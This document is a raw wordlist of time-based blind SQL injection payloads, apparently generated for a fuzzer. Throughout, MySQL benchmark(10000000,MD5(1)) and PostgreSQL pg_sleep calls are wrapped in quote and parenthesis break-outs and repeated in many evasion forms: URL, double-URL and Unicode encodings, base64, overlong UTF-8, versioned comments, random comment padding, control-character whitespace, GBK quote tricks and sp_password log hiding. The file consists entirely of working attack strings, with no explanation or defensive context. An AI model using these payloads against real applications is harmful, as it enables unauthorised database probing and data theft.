"%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

"%0Aor%0Dbenchmark(10000000,MD5(1))#

"--%0Aor--%0Abenchmark(10000000,MD5(1))#

"+or+benchmark(10000000,MD5(1))#

"%0Dor%0Dbenchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

" or benchmark(10000000,MD5(1))#

%EF%BC%87 or benchmark(10000000,MD5(1))#

%00%27 or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#
%00
JyBvciBiZW5jaG1hcmsoMTAwMDAwMDAsTUQ1KDEpKSMK
' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

%2527%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%27%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0027%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' /*!30347or benchmark(10000000,MD5(1))*/#

' /*!00000or benchmark(10000000,MD5(1))*/#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

%C0%AF%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%' %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#
 and '0having'='0having'
' or benchmark(10000000,MD5(1))#
sp_password
'/**/or/**/benchmark(10000000,MD5(1))#

'--fEulXcZdtIrT%0Aor--jgIclx%0Abenchmark(10000000,MD5(1))#

'%23VUTKro%0Aor%23kNSJVTfgex%0Abenchmark(10000000,MD5(1))#

'%23idBpFay%0Aor%23pJvBIOvzey%0Abenchmark(10000000,MD5(1))#

'%09or%03benchmark(10000000,MD5(1))#

'%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

'%0Bor%0Cbenchmark(10000000,MD5(1))#

'--%0Aor--%0Abenchmark(10000000,MD5(1))#

'+or+benchmark(10000000,MD5(1))#

'%0Dor%0Cbenchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

%bf%27 or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

' or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#
%00
MSkgb3IgYmVuY2htYXJrKDEwMDAwMDAwLE1ENSgxKSkjCg==
1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

%2531%2529%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%31%29%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0031%u0029%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) /*!30955or benchmark(10000000,MD5(1))*/#

1) /*!00000or benchmark(10000000,MD5(1))*/#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1%C0%AB%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%1%) %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#
 and '0having'='0having'
1) or benchmark(10000000,MD5(1))#
sp_password
1)/**/or/**/benchmark(10000000,MD5(1))#

1)--OniFCgCzIW%0Aor--NrBcNTrH%0Abenchmark(10000000,MD5(1))#

1)%23CsxmaSD%0Aor%23dUNdOskYvW%0Abenchmark(10000000,MD5(1))#

1)%23cAJUUswSnvad%0Aor%23OlWAefIHM%0Abenchmark(10000000,MD5(1))#

1)%03or%0Abenchmark(10000000,MD5(1))#

1)%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

1)%0Aor%0Dbenchmark(10000000,MD5(1))#

1)--%0Aor--%0Abenchmark(10000000,MD5(1))#

1)+or+benchmark(10000000,MD5(1))#

1)%0Dor%0Cbenchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

1) or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#
%00
Iikgb3IgYmVuY2htYXJrKDEwMDAwMDAwLE1ENSgxKSkjCg==
") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

%2522%2529%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%22%29%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0022%u0029%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") /*!30972or benchmark(10000000,MD5(1))*/#

") /*!00000or benchmark(10000000,MD5(1))*/#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

%C0%AA%C0%AB%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%"%) %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#
 and '0having'='0having'
") or benchmark(10000000,MD5(1))#
sp_password
")/**/or/**/benchmark(10000000,MD5(1))#

")--KpqgWWRlAJR%0Aor--eFVycYSFw%0Abenchmark(10000000,MD5(1))#

")%23VYMByvFkoqAg%0Aor%23ntZCYddyPhds%0Abenchmark(10000000,MD5(1))#

")%23LciAeC%0Aor%23cQscBSswkmt%0Abenchmark(10000000,MD5(1))#

")%0Eor%09benchmark(10000000,MD5(1))#

")%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

")%0Dor%0Cbenchmark(10000000,MD5(1))#

")--%0Aor--%0Abenchmark(10000000,MD5(1))#

")+or+benchmark(10000000,MD5(1))#

")%09or%0Dbenchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

") or benchmark(10000000,MD5(1))#

%EF%BC%87) or benchmark(10000000,MD5(1))#

%00%27) or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#
%00
Jykgb3IgYmVuY2htYXJrKDEwMDAwMDAwLE1ENSgxKSkjCg==
') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

%2527%2529%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%27%29%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0027%u0029%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') /*!30956or benchmark(10000000,MD5(1))*/#

') /*!00000or benchmark(10000000,MD5(1))*/#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

%C0%AF%C0%AB%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%'%) %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#
 and '0having'='0having'
') or benchmark(10000000,MD5(1))#
sp_password
')/**/or/**/benchmark(10000000,MD5(1))#

')--eBcfbvtxCt%0Aor--QRTTTx%0Abenchmark(10000000,MD5(1))#

')%23kQmqqiOYLu%0Aor%23ZZFiIsIYKK%0Abenchmark(10000000,MD5(1))#

')%23fLpSzdiFq%0Aor%23bGzEHGQcqh%0Abenchmark(10000000,MD5(1))#

')%09or%03benchmark(10000000,MD5(1))#

')%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

')%0Bor%0Abenchmark(10000000,MD5(1))#

')--%0Aor--%0Abenchmark(10000000,MD5(1))#

')+or+benchmark(10000000,MD5(1))#

')%0Aor%0Abenchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

%bf%27) or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

') or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#
%00
MSkpIG9yIGJlbmNobWFyaygxMDAwMDAwMCxNRDUoMSkpIwo=
1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

%2531%2529%2529%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%31%29%29%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0031%u0029%u0029%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) /*!30683or benchmark(10000000,MD5(1))*/#

1)) /*!00000or benchmark(10000000,MD5(1))*/#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1%C0%AB%C0%AB%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%1%)%) %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#
 and '0having'='0having'
1)) or benchmark(10000000,MD5(1))#
sp_password
1))/**/or/**/benchmark(10000000,MD5(1))#

1))--uBRjgpNgtN%0Aor--eRoPQj%0Abenchmark(10000000,MD5(1))#

1))%23eEqlrMpEt%0Aor%23hyeBHuOIktUT%0Abenchmark(10000000,MD5(1))#

1))%23kCuXSDBURln%0Aor%23gFKkyXSRsK%0Abenchmark(10000000,MD5(1))#

1))%07or%02benchmark(10000000,MD5(1))#

1))%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

1))%0Dor%09benchmark(10000000,MD5(1))#

1))--%0Aor--%0Abenchmark(10000000,MD5(1))#

1))+or+benchmark(10000000,MD5(1))#

1))%0Cor%09benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

1)) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#
%00
IikpIG9yIGJlbmNobWFyaygxMDAwMDAwMCxNRDUoMSkpIwo=
")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

%2522%2529%2529%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%22%29%29%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0022%u0029%u0029%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) /*!30724or benchmark(10000000,MD5(1))*/#

")) /*!00000or benchmark(10000000,MD5(1))*/#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

%C0%AA%C0%AB%C0%AB%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%"%)%) %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#
 and '0having'='0having'
")) or benchmark(10000000,MD5(1))#
sp_password
"))/**/or/**/benchmark(10000000,MD5(1))#

"))--rcZbzspE%0Aor--ClidOKO%0Abenchmark(10000000,MD5(1))#

"))%23NagNSaTvjKra%0Aor%23PSiKaxv%0Abenchmark(10000000,MD5(1))#

"))%23phJWaZ%0Aor%23MaSNgJsJ%0Abenchmark(10000000,MD5(1))#

"))%0For%04benchmark(10000000,MD5(1))#

"))%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

"))%0Aor%0Dbenchmark(10000000,MD5(1))#

"))--%0Aor--%0Abenchmark(10000000,MD5(1))#

"))+or+benchmark(10000000,MD5(1))#

"))%0Cor%09benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

")) or benchmark(10000000,MD5(1))#

%EF%BC%87)) or benchmark(10000000,MD5(1))#

%00%27)) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#
%00
JykpIG9yIGJlbmNobWFyaygxMDAwMDAwMCxNRDUoMSkpIwo=
')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

%2527%2529%2529%2520%256F%2572%2520%2562%2565%256E%2563%2568%256D%2561%2572%256B%2528%2531%2530%2530%2530%2530%2530%2530%2530%252C%254D%2544%2535%2528%2531%2529%2529%2523%250A
%27%29%29%20%6F%72%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%2C%4D%44%35%28%31%29%29%23%0A
%u0027%u0029%u0029%u0020%u006F%u0072%u0020%u0062%u0065%u006E%u0063%u0068%u006D%u0061%u0072%u006B%u0028%u0031%u0030%u0030%u0030%u0030%u0030%u0030%u0030%u002C%u004D%u0044%u0035%u0028%u0031%u0029%u0029%u0023%u000A
')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) /*!30971or benchmark(10000000,MD5(1))*/#

')) /*!00000or benchmark(10000000,MD5(1))*/#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

%C0%AF%C0%AB%C0%AB%C0%AAor%C0%AAbenchmark%C0%AA10000000%C0%AEMD5%C0%AA1%C0%AB%C0%AB%C0%AB%C0%8A
%'%)%) %o%r %b%e%n%c%h%m%a%r%k%(%1%0%0%0%0%0%0%0%,%M%D%5%(%1%)%)%#%

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#
 and '0having'='0having'
')) or benchmark(10000000,MD5(1))#
sp_password
'))/**/or/**/benchmark(10000000,MD5(1))#

'))--SMaesrRZ%0Aor--VwIbHcu%0Abenchmark(10000000,MD5(1))#

'))%23FlTuVKnJ%0Aor%23xSJmtHU%0Abenchmark(10000000,MD5(1))#

'))%23ArouZDGZvEig%0Aor%23hqJxQGfHjpm%0Abenchmark(10000000,MD5(1))#

'))%08or%0Ebenchmark(10000000,MD5(1))#

'))%23%0Aor%23%0Abenchmark(10000000,MD5(1))#

'))%0Aor%0Abenchmark(10000000,MD5(1))#

'))--%0Aor--%0Abenchmark(10000000,MD5(1))#

'))+or+benchmark(10000000,MD5(1))#

'))%0Aor%0Cbenchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

%bf%27)) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

')) or benchmark(10000000,MD5(1))#

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--
%00
cGdfc2xlZXAoX19USU1FX18pLS0K
pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--
 and '0having'='0having'
pg_sleep(__TIME__)--
-- sp_password
pg_sleep(__TIME__)--/**/
pg_sleep(__TIME__)----futvZzV%0A
pg_sleep(__TIME__)--%23knhVhWERcF%0A
pg_sleep(__TIME__)--%23qqWCrW%0A
pg_sleep(__TIME__)--%02
pg_sleep(__TIME__)--%23%0A
pg_sleep(__TIME__)--%0D
pg_sleep(__TIME__)----%0A
pg_sleep(__TIME__)--+
pg_sleep(__TIME__)--%09
pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--
%00
MSBvciBwZ19zbGVlcChfX1RJTUVfXyktLQo=
1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

%2531%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%31%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0031%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 /*!30494or pg_sleep(__TIME__)*/--

1 /*!00000or pg_sleep(__TIME__)*/--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%1 %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--
 and '0having'='0having'
1 or pg_sleep(__TIME__)--
-- sp_password
1/**/or/**/pg_sleep(__TIME__)--

1--qGcWTCprO%0Aor--XQPnXBaCNlz%0Apg_sleep(__TIME__)----FCUxZF%0A
1%23AzvfGUYm%0Aor%23kwDyMKVB%0Apg_sleep(__TIME__)--%23eNQlBTYvPRqX%0A
1%23cqasXXqRycl%0Aor%23jZBBeN%0Apg_sleep(__TIME__)--%23LkVXVddOz%0A
1%02or%06pg_sleep(__TIME__)--

1%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
1%0Dor%09pg_sleep(__TIME__)--

1--%0Aor--%0Apg_sleep(__TIME__)----%0A
1+or+pg_sleep(__TIME__)--

1%0Aor%0Apg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

1 or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--
%00
IiBvciBwZ19zbGVlcChfX1RJTUVfXyktLQo=
" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

%2522%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%22%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0022%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" /*!30330or pg_sleep(__TIME__)*/--

" /*!00000or pg_sleep(__TIME__)*/--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

%C0%AA%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%" %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--
 and '0having'='0having'
" or pg_sleep(__TIME__)--
-- sp_password
"/**/or/**/pg_sleep(__TIME__)--

"--pOSXFzT%0Aor--MDqjmfBsyJRr%0Apg_sleep(__TIME__)----KgvkYbGtBG%0A
"%23BMdXzzkLpK%0Aor%23ncUOTJwyxRW%0Apg_sleep(__TIME__)--%23qwBObqEmgBCT%0A
"%23BALPLyDDsX%0Aor%23QQIreEguxFOw%0Apg_sleep(__TIME__)--%23NmzjayxB%0A
"%08or%09pg_sleep(__TIME__)--

"%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
"%0Bor%0Dpg_sleep(__TIME__)--

"--%0Aor--%0Apg_sleep(__TIME__)----%0A
"+or+pg_sleep(__TIME__)--

"%0Aor%0Apg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

" or pg_sleep(__TIME__)--

%EF%BC%87 or pg_sleep(__TIME__)--

%00%27 or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--
%00
JyBvciBwZ19zbGVlcChfX1RJTUVfXyktLQo=
' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

%2527%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%27%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0027%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' /*!30594or pg_sleep(__TIME__)*/--

' /*!00000or pg_sleep(__TIME__)*/--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

%C0%AF%C0%AAor%C0%AApg%C0%DFsleep%C0%AA%C0%DF%C0%DFTIME%C0%DF%C0%DF%C0%AB%C0%AF%C0%AF%C0%8A
%' %o%r %p%g%_%s%l%e%e%p%(%_%_%T%I%M%E%_%_%)%-%-%

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--
 and '0having'='0having'
' or pg_sleep(__TIME__)--
-- sp_password
'/**/or/**/pg_sleep(__TIME__)--

'--MlMZJVYyh%0Aor--muqKrtHJteI%0Apg_sleep(__TIME__)----xrayfkPHu%0A
'%23kkhRGNm%0Aor%23pEndnR%0Apg_sleep(__TIME__)--%23EBcHqdjuqiS%0A
'%23uxDvWUcYWRt%0Aor%23xyQddbadP%0Apg_sleep(__TIME__)--%23zuPTRbHrX%0A
'%08or%0Bpg_sleep(__TIME__)--

'%23%0Aor%23%0Apg_sleep(__TIME__)--%23%0A
'%0Cor%0Dpg_sleep(__TIME__)--

'--%0Aor--%0Apg_sleep(__TIME__)----%0A
'+or+pg_sleep(__TIME__)--

'%0Cor%09pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

%bf%27 or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

' or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--
%00
MSkgb3IgcGdfc2xlZXAoX19USU1FX18pLS0K
1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

%2531%2529%2520%256F%2572%2520%2570%2567%255F%2573%256C%2565%2565%2570%2528%255F%255F%2554%2549%254D%2545%255F%255F%2529%252D%252D%250A
%31%29%20%6F%72%20%70%67%5F%73%6C%65%65%70%28%5F%5F%54%49%4D%45%5F%5F%29%2D%2D%0A
%u0031%u0029%u0020%u006F%u0072%u0020%u0070%u0067%u005F%u0073%u006C%u0065%u0065%u0070%u0028%u005F%u005F%u0054%u0049%u004D%u0045%u005F%u005F%u0029%u002D%u002D%u000A
1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

1) or pg_sleep(__TIME__)--

